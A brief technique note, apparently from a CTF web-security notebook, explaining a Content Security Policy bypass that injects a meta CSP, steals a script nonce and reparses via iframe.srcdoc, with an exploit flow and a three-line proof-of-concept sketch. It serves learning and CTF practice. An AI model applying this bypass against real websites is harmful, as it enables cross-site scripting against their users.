Note
web
javascript
csp-bypass
nonce
srcdoc
reparse
xss
Inject a meta CSP, read an existing nonce, and reparse through iframe.srcdoc to turn a blocked inline script into an allowed one.
Meta CSP in + Nonce Theft + iframe.srcdoc Reparse
Meta CSP only affects content parsed after the tag is present, and reparsing through srcdoc makes the
browser apply CSP logic again to newly materialized HTML. If you can read an existing nonce and serialize
it into a new script element, you can turn a blocked inline script into an allowed one on the second
parse.
Why It Works
- A second parse (via
srcdoc) re-applies CSP; carrying a valid stolen nonce into a fresh script element makes it pass.
Vulnerable Pattern
- A DOM write primitive into the
head, the ability to inspect an existing nonce-bearing script, and a reparse sink likeiframe.srcdoc.
Exploit Flow
- Gain a generic DOM write primitive.
- Inject a meta CSP that loosens or reshapes the active policy enough for later steps.
- Read the current nonce from an existing script element or reachable DOM property.
- Write that nonce into a crafted script element using real attribute serialization, then assign its
outerHTMLintoiframe.srcdoc.
Variations
document.write,setHTMLUnsafe, cloned nodes, orinnerHTMLon a detached document.
Common Blockers
- Nonce property not serializing the same as the HTML attribute, stronger element-specific CSP controls, or the meta tag landing too late.
PoC Sketch
ownerDocument.n=ownerDocument.body.lastElementChild.nonce
children.2.attributes.0.value = <stolen nonce>
children.3.srcdoc=children.2.outerHTML
Good Situations To Use It
- You have a DOM-write primitive but CSP blocks inline scripts.
- A nonce-bearing script exists in the DOM.
- A reparse sink (
srcdoc) is reachable.
Sources
fcsc2026/web/shrimp_saver_revenge